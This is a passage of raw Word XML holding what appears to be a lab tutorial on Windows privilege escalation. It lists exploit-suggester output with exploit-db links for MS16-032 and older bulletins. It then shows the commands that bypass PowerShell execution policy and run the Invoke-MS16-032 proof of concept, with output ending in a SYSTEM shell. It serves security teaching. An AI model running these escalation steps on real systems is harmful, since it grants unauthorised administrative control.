          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:softHyphen/>
        <w:t>Walker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCEA5A7"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5EB5C87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[E] MS16-032: Security Update for Secondary Logon to Address Elevation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Privile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3143141) - Important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED7698B"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https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F8F92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https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727BFA9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https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 &amp; Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1949DC2F"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https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 &amp; Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4190C2D4"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698F0AF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FA59328"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&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0B3A0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FBEDA5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27CC134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MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0D51EE"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MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290CF2F3"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[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D125C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MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A3F4ED"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MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F7FEA5"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MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F0AB8C"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MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F20F20"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MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023AFC72"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MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF34F46"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MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3034EA34"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MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79099917"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[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0042FD26"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lastRenderedPageBreak/>
        <w:t>[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F63C99"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http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP &amp; EMET 5., PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157F905A"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http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP &amp; EMET 5.0 Bypass (MS12-037), PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D19B98"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xml:space="preserve">[*] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594AFA52"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F6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>[*] done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C720F68"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Suppose we have obtained a Meterpreter shell on our target using the Metasploit framework. In that case, we can also use this </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00DF6D5F">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>local exploit suggester module</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> which will help us quickly find any potential privilege escalation vectors and run them within Metasploit should any module exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC5C6AC"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Looking through the results, we can see a rather extensive list, some Metasploit modules, and some standalone PoC exploits. We must filter through the noise, remove any </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Denial of Service</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploits, and exploits that do not make sense for our target OS. One that stands out immediately as interesting is MS16-032. A detailed explanation of this bug can be found in this </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00DF6D5F">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>Project Zero blog post</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is a bug in the Secondary Logon Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74638FAB"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Exploiting MS16-032 with PowerShell PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8B957F"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Let's use a </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00DF6D5F">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>PowerShell PoC</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to attempt to exploit this and elevate our privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F30513" w14:textId="77777777" w:rsidR="00DF6D5F" w:rsidRPr="00DF6D5F" w:rsidRDefault="00DF6D5F" w:rsidP="00DF6D5F">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Exploiting MS16-032 with PowerShell PoC </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51167EDF"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PS C:\htb&gt; Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> bypass -scope process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670E0A19"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0A6602A"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Execution Policy Change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C3E122"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The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>expose</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5AA09FD4"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you to the security risks described in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>about_Execution_Policies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> help topic. Do you want to change the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>execution</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5F2076FC"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policy?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B817BC2"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[Y] </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Yes  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>N] No  [S] Suspend  [?] Help (default is "Y"): A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3175B5FE"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[Y] </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Yes  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>N] No  [S] Suspend  [?] Help (default is "Y"): Y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD39623"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F336D6B"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2F97E43"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PS C:\htb&gt; Import-Module .\Invoke-MS16-032.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386D8265"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PS C:\htb&gt; Invoke-MS16-032</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C301D0E"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CD7940D"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__ __ ___ ___   ___     ___ ___ ___</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35579B21"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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>|  V</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  _|_  | |  _|___|   |_  |_  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE703BF"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     |_  |_| |_| . |___| | |_  |  _|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4587B085"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|_|_|_|___|_____|___|   |___|___|___|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018BBB28"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897A307"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[by b33f -&gt; @FuzzySec]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5637E9"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2ABA7F5"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Operating system core count: 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E573253"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[&gt;] Duplicating </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CreateProcessWithLogonW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> handle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72328F90"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Done, using thread handle: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>1656</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="18BA796E"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4D13D03"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Sniffing out privileged impersonation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>token..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2A1E83F1"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FB884F2"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Thread belongs to: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>svchost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="14D1344C"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Thread </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>suspended</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="38D00F2B"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[&gt;] Wiping current impersonation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="20E2AA02"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[&gt;] Building SYSTEM impersonation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="32A0C9D9"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lastRenderedPageBreak/>
        <w:t>[?] Success, open SYSTEM token handle: 1652</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6C495F"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Resuming </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>thread..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1E479C8D"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C4D9B4C"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 Sniffing out SYSTEM </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>shell..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="084B96CB"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6E4979A"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[&gt;] Duplicating SYSTEM token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A98CF15"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[&gt;] Starting token </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>race</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="734D0DD3"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xml:space="preserve">[&gt;] Starting process </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>race</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6E185681" w14:textId="77777777" w:rsidR="00DF6D5F" w:rsidRPr="00DF6D5F" w:rsidRDefault="00DF6D5F" w:rsidP="00DF6D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F6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>[!] Holy handle leak Batman, we have a SYSTEM shell!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BB80A2" w14:textId="77777777" w:rsidR="00DF6D5F" w:rsidRPr="00DF6D5F" w:rsidRDefault="00DF6D5F" w:rsidP="00DF6D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F6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Spawning a SYSTEM Console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5242A4BC" w14:textId="77777777" w:rsidR="00DF6D5F" w:rsidRPr="00DF6D5F" w:rsidRDefault="00DF6D5F" w:rsidP="00DF6D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This works and we spawn a SYSTEM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
